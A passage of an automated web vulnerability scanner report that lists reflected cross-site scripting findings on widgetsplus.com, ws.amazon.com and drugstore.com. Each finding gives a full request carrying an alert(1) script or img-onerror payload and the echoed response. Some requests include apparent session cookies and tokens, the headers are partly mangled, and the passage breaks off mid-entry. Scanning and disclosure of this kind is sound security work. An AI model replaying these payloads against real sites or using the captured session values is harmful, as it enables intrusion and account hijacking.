GET /buttons/count?url=http%3A//thehackernews.com/2011/09/godaddy-websites-compromised-with.html5851e<script>alert(1)</script>9bc50613a06 HTTP/1.1/2011/09/godaddy-websites-compromised-with.html;q=0.3
Response
HTTP/1.1 200 OK: "http://thehackernews.com/2011/09/godaddy-websites-compromised-with.html5851e<script>alert(1)</script>9bc50613a06 ", "diggs": 0});
2.21. http://widgetsplus.com/google_plus_widget.php [bbc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bbc request parameter is copied into the HTML document as plain text between tags. The payload 26123<img%20src%3da%20onerror%3dalert(1)>0030d6232d9 was submitted in the bbc parameter. This input was echoed as 26123<img src=a onerror=alert(1)>0030d6232d9 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D526123<img%20src%3da%20onerror%3dalert(1)>0030d6232d9 &bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... _wrapper {-color:#4889F0;border:1px solid #3F79D526123<img src=a onerror=alert(1)>0030d6232d9 ; ...[SNIP]...
2.22. http://widgetsplus.com/google_plus_widget.php [bbgc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bbgc request parameter is copied into the HTML document as plain text between tags. The payload 575dd<img%20src%3da%20onerror%3dalert(1)>be9761ccb76 was submitted in the bbgc parameter. This input was echoed as 575dd<img src=a onerror=alert(1)>be9761ccb76 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0575dd<img%20src%3da%20onerror%3dalert(1)>be9761ccb76 &bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... _wrapper {-color:#4889F0575dd<img src=a onerror=alert(1)>be9761ccb76 ;border:1px solid #3F79D5; ...[SNIP]...
2.23. http://widgetsplus.com/google_plus_widget.php [bc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bc request parameter is copied into the HTML document as plain text between tags. The payload 297ea<img%20src%3da%20onerror%3dalert(1)>53e9bfca482 was submitted in the bc parameter. This input was echoed as 297ea<img src=a onerror=alert(1)>53e9bfca482 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a297ea<img%20src%3da%20onerror%3dalert(1)>53e9bfca482 &l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... ;border-color:#3b71c6; }297ea<img src=a onerror=alert(1)>53e9bfca482 ; ...[SNIP]...
2.24. http://widgetsplus.com/google_plus_widget.php [bfc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bfc request parameter is copied into the HTML document as plain text between tags. The payload 3decf<img%20src%3da%20onerror%3dalert(1)>06ef7a643ee was submitted in the bfc parameter. This input was echoed as 3decf<img src=a onerror=alert(1)>06ef7a643ee in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF3decf<img%20src%3da%20onerror%3dalert(1)>06ef7a643ee &bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... 3decf<img src=a onerror=alert(1)>06ef7a643ee ; (images/button_gra.png);...[SNIP]...
2.25. http://widgetsplus.com/google_plus_widget.php [bmobc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bmobc request parameter is copied into the HTML document as plain text between tags. The payload 1c0d0<img%20src%3da%20onerror%3dalert(1)>6bc8e074c27 was submitted in the bmobc parameter. This input was echoed as 1c0d0<img src=a onerror=alert(1)>6bc8e074c27 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c61c0d0<img%20src%3da%20onerror%3dalert(1)>6bc8e074c27 &bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... _wrapper a:active {_wrapper:hover {;border-color:#3b71c61c0d0<img src=a onerror=alert(1)>6bc8e074c27 ; }...[SNIP]...
2.26. http://widgetsplus.com/google_plus_widget.php [bmoc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bmoc request parameter is copied into the HTML document as plain text between tags. The payload 18f1c<img%20src%3da%20onerror%3dalert(1)>c9726905144 was submitted in the bmoc parameter. This input was echoed as 18f1c<img src=a onerror=alert(1)>c9726905144 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D518f1c<img%20src%3da%20onerror%3dalert(1)>c9726905144 &bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... _wrapper a:active {_wrapper:hover {18f1c<img src=a onerror=alert(1)>c9726905144 ;border-color:#3b71c6; }...[SNIP]...
2.27. http://widgetsplus.com/google_plus_widget.php [bmofc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bmofc request parameter is copied into the HTML document as plain text between tags. The payload 9c586<img%20src%3da%20onerror%3dalert(1)>c9c1e598079 was submitted in the bmofc parameter. This input was echoed as 9c586<img src=a onerror=alert(1)>c9c1e598079 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff9c586<img%20src%3da%20onerror%3dalert(1)>c9c1e598079 &tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... .png);9c586<img src=a onerror=alert(1)>c9c1e598079 ; }_wrapper a:active {_wrapper:hover {;border-color:#3b71c6; }...[SNIP]...
2.28. http://widgetsplus.com/google_plus_widget.php [bw parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the bw request parameter is copied into the HTML document as plain text between tags. The payload 62523<img%20src%3da%20onerror%3dalert(1)>aadb8f6bb97 was submitted in the bw parameter. This input was echoed as 62523<img src=a onerror=alert(1)>aadb8f6bb97 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=10062523<img%20src%3da%20onerror%3dalert(1)>aadb8f6bb97 &b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... _wrapper {62523<img src=a onerror=alert(1)>aadb8f6bb97 px;background-color:#4889F0;border:1px solid #3F79D5; ...[SNIP]...
2.29. http://widgetsplus.com/google_plus_widget.php [fs parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the fs request parameter is copied into the HTML document as plain text between tags. The payload 25579<img%20src%3da%20onerror%3dalert(1)>ebba964c05f was submitted in the fs parameter. This input was echoed as 25579<img src=a onerror=alert(1)>ebba964c05f in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=1625579<img%20src%3da%20onerror%3dalert(1)>ebba964c05f &fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... "Nimbus Sans L",sans-serif; 25579<img src=a onerror=alert(1)>ebba964c05f px; font-weight: bold;_wrapper {...[SNIP]...
2.30. http://widgetsplus.com/google_plus_widget.php [host parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the host request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3febc"><img%20src%3da%20onerror%3dalert(1)>4e99e88f065 was submitted in the host parameter. This input was echoed as 3febc\"><img src=a onerror=alert(1)>4e99e88f065 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com3febc"><img%20src%3da%20onerror%3dalert(1)>4e99e88f065 &mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... .com/106933972856076071655" id="wgp_name" target="_blank" onClick="recordOutboundLink(this, 'Name', 'thehackernews.com3febc\"><img src=a onerror=alert(1)>4e99e88f065 ');return false;">...[SNIP]...
2.31. http://widgetsplus.com/google_plus_widget.php [mbc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the mbc request parameter is copied into the HTML document as plain text between tags. The payload b8c34<img%20src%3da%20onerror%3dalert(1)>aa7595485d9 was submitted in the mbc parameter. This input was echoed as b8c34<img src=a onerror=alert(1)>aa7595485d9 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cececeb8c34<img%20src%3da%20onerror%3dalert(1)>aa7595485d9 &bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... "Nimbus Sans L",sans-serif;b8c34<img src=a onerror=alert(1)>aa7595485d9 ;background-color:#f5f5f5; "Nimbus Sans L",sans-serif; ...[SNIP]...
2.32. http://widgetsplus.com/google_plus_widget.php [mbgc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the mbgc request parameter is copied into the HTML document as plain text between tags. The payload 9a67e<img%20src%3da%20onerror%3dalert(1)>888a5103c6d was submitted in the mbgc parameter. This input was echoed as 9a67e<img src=a onerror=alert(1)>888a5103c6d in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f59a67e<img%20src%3da%20onerror%3dalert(1)>888a5103c6d &ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... "Nimbus Sans L",sans-serif;#f5f5f59a67e<img src=a onerror=alert(1)>888a5103c6d ; "Nimbus Sans L",sans-serif; ...[SNIP]...
2.33. http://widgetsplus.com/google_plus_widget.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2fb18<img%20src%3da%20onerror%3dalert(1)>e30ed8f3c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fb18<img src=a onerror=alert(1)>e30ed8f3c79 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=48/2fb18<img%20src%3da%20onerror%3dalert(1)>e30ed8f3c79 89F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... 2fb18<img src=a onerror=alert(1)>e30ed8f3c79 89F0; }...[SNIP]...
2.34. http://widgetsplus.com/google_plus_widget.php [nc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the nc request parameter is copied into the HTML document as plain text between tags. The payload 32064<img%20src%3da%20onerror%3dalert(1)>bfaaad071b9 was submitted in the nc parameter. This input was echoed as 32064<img src=a onerror=alert(1)>bfaaad071b9 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a32064<img%20src%3da%20onerror%3dalert(1)>bfaaad071b9 &bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... "Nimbus Sans L",sans-serif; 32064<img src=a onerror=alert(1)>bfaaad071b9 ; font-size:16px; font-weight: bold;_wrapper {...[SNIP]...
2.35. http://widgetsplus.com/google_plus_widget.php [pc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the pc request parameter is copied into the HTML document as plain text between tags. The payload 94c51<img%20src%3da%20onerror%3dalert(1)>948ccca63d4 was submitted in the pc parameter. This input was echoed as 94c51<img src=a onerror=alert(1)>948ccca63d4 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F094c51<img%20src%3da%20onerror%3dalert(1)>948ccca63d4 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... 94c51<img src=a onerror=alert(1)>948ccca63d4 ; }...[SNIP]...
2.36. http://widgetsplus.com/google_plus_widget.php [t parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 89cf2<img%20src%3da%20onerror%3dalert(1)>9a7be0850b8 was submitted in the t parameter. This input was echoed as 89cf2<img src=a onerror=alert(1)>9a7be0850b8 in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on89cf2<img%20src%3da%20onerror%3dalert(1)>9a7be0850b8 &fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... 89cf2<img src=a onerror=alert(1)>9a7be0850b8 </span>...[SNIP]...
2.37. http://widgetsplus.com/google_plus_widget.php [tc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the tc request parameter is copied into the HTML document as plain text between tags. The payload 8439b<img%20src%3da%20onerror%3dalert(1)>5879202c08c was submitted in the tc parameter. This input was echoed as 8439b<img src=a onerror=alert(1)>5879202c08c in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece&tc=6a6a6a8439b<img%20src%3da%20onerror%3dalert(1)>5879202c08c &nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... 8439b<img src=a onerror=alert(1)>5879202c08c ; font-family:"Helvetica Neue",Arial,Helvetica,"Nimbus Sans L",sans-serif; ...[SNIP]...
2.38. http://widgetsplus.com/google_plus_widget.php [tlc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgetsplus.com
Path:
/google_plus_widget.php
Issue detail
The value of the tlc request parameter is copied into the HTML document as plain text between tags. The payload 2bfeb<img%20src%3da%20onerror%3dalert(1)>eb9fdd2a92b was submitted in the tlc parameter. This input was echoed as 2bfeb<img src=a onerror=alert(1)>eb9fdd2a92b in the application's response.
Request
GET /google_plus_widget.php?pid=106933972856076071655&host=thehackernews.com&mbgc=f5f5f5&ww=310&mbc=cecece&bbc=3F79D5&bmobc=3b71c6&bbgc=4889F0&bmoc=3F79D5&bfc=FFFFFF&bmofc=ffffff&tlc=cecece2bfeb<img%20src%3da%20onerror%3dalert(1)>eb9fdd2a92b &tc=6a6a6a&nc=6a6a6a&bc=6a6a6a&l=y&t=Add_me_on&fs=16&fsb=13&bw=100&b=s&ff=4&pc=4889F0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK-Agent/xhtml1/DTD/xhtml1-transitional.dtd">;charset=ut...[SNIP]... 2bfeb<img src=a onerror=alert(1)>eb9fdd2a92b ;color:#6a6a6a; font-family:"Helvetica Neue",Arial,Helvetica,"Nimbus Sans L",sans-serif; ...[SNIP]...
2.39. http://ws.amazon.com/widgets/q [InstanceId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ws.amazon.com
Path:
/widgets/q
Issue detail
The value of the InstanceId request parameter is copied into the HTML document as plain text between tags. The payload ad702<script>alert(1)</script>0fab63627de was submitted in the InstanceId parameter. This input was echoed unmodified in the application's response.
Request
GET /widgets/q?Operation=GetTopSellers&URL=http%3A//portal.opera.com/&InstanceId=0ad702<script>alert(1)</script>0fab63627de &ResponseCount=6&TemplateId=8002&ServiceVersion=20070822&MarketPlace=US HTTP/1.1;q=0.3.337409241.1315233673.1315233673.1315236916.2; __utmz=194891197.1315236916.2.2.utmccn=(referral)|utmcsr=aws-portal.amazon.com|utmcct=/gp/aws/html-forms-controller/contactus98dd2'%3bac3249871a9/aws-account-and-billing|utmcmd=referral; ct-main="?yScNOlWT31nv@QGPOP6MZlUTgEuPV67"; apn-user-id=ad436c0d-3f66-48df-8380-85023e358301; x-main="kYmMgX@s6zRSHrgXsrT2Jct5JsIxFj@7"; aws-ubid-main=189-0212498-8250436; aws-x-main=UsPqM6hqJEtppz2vUlxJzQS7UOORf9DA; session-token=SQF/NkehkGMk+jdlo6/NLXrRBtfG2aeSiUcxmLBxdBQ8cmJRMfNGlYkOX0a/N00l4OzAutqHvfb9FBh+fr8MF6/DdmBOr5uYhE9XOogb0pkADN6BRGFMatq2bldyvYdHA3jnepv+7Arl9xnJWdTft1/gFN5GixtGQVw8ONCdfFj7229gWrFCR/ylhyeHArd92XSZrR8ObUdlW6zcVvlI08NLUSNtliR/aHfv+MkySJE2G/JWqf7h9pFBH71guzzVfsd8zXeStVUwsLfl2A70Cg==; ubid-main=189-8322294-4852542; session-id-time=2082787201l; session-id=188-7348060-9795407
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "_callback({results:[ { ASIN : "B002B28IA4" , Title : "Relator" , Price : "$0.99" , ImageUrl : "http:\/\/ecx.images-amazon.com\/images\/I\/51QAVIbyegL._SL160_.jpg" , LargeImageUrl : "...[SNIP]... ad702<script>alert(1)</script>0fab63627de "})
2.40. http://ws.amazon.com/widgets/q [rt parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ws.amazon.com
Path:
/widgets/q
Issue detail
The value of the rt request parameter is copied into the HTML document as plain text between tags. The payload 95dae<script>alert(1)</script>6a5adbf78b9 was submitted in the rt parameter. This input was echoed unmodified in the application's response.
Request
GET /widgets/q?rt=tf_sw95dae<script>alert(1)</script>6a5adbf78b9 &ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/opera-20/8002/238229ae-452b-41fb-b7b3-1913a7cb0733 HTTP/1.1;q=0.3.337409241.1315233673.1315233673.1315236916.2; __utmz=194891197.1315236916.2.2.utmccn=(referral)|utmcsr=aws-portal.amazon.com|utmcct=/gp/aws/html-forms-controller/contactus98dd2'%3bac3249871a9/aws-account-and-billing|utmcmd=referral; ct-main="?yScNOlWT31nv@QGPOP6MZlUTgEuPV67"; apn-user-id=ad436c0d-3f66-48df-8380-85023e358301; x-main="kYmMgX@s6zRSHrgXsrT2Jct5JsIxFj@7"; aws-ubid-main=189-0212498-8250436; aws-x-main=UsPqM6hqJEtppz2vUlxJzQS7UOORf9DA; session-token=SQF/NkehkGMk+jdlo6/NLXrRBtfG2aeSiUcxmLBxdBQ8cmJRMfNGlYkOX0a/N00l4OzAutqHvfb9FBh+fr8MF6/DdmBOr5uYhE9XOogb0pkADN6BRGFMatq2bldyvYdHA3jnepv+7Arl9xnJWdTft1/gFN5GixtGQVw8ONCdfFj7229gWrFCR/ylhyeHArd92XSZrR8ObUdlW6zcVvlI08NLUSNtliR/aHfv+MkySJE2G/JWqf7h9pFBH71guzzVfsd8zXeStVUwsLfl2A70Cg==; ubid-main=189-8322294-4852542; session-id-time=2082787201l; session-id=188-7348060-9795407
Response
HTTP/1.1 200 OK.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC ";charset=UTF-8:"opera-20","width":"615","inner_bkgd_color":"#FFFFFF","serviceVersion":"20070822","use_default_search_term":false,"...[SNIP]... "border_color":"#636363","text_color":"#000000"}/8002/238229ae-452b-41fb-b7b3-1913a7cb0733";95dae<script>alert(1)</script>6a5adbf78b9 ";.getStringForUS = function(key){...[SNIP]...
2.41. http://www.drugstore.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec1bb"><script>alert(1)</script>204f91ee9a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /?ec1bb"><script>alert(1)</script>204f91ee9a2 =1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7:7B1B08A6C5BF4A968C79C9BFB007FDD0:e5fygw55j4x2lwjzim2cqdi4
Response
HTTP/1.1 200 OK:7B1B08A6C5BF4A968C79C9BFB007FDD0:iqngviqoeihb2c45cjnvlk45; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/=2316609728.0.0000; expires=Fri, 16-Sep-2011 17:30:37 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... ec1bb"><script>alert(1)</script>204f91ee9a2 =1" />...[SNIP]...
2.42. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.drugstore.com
Path:
/pharmacy/drugindex/rxsearch.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e13"><script>alert(1)</script>b95a630ec78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
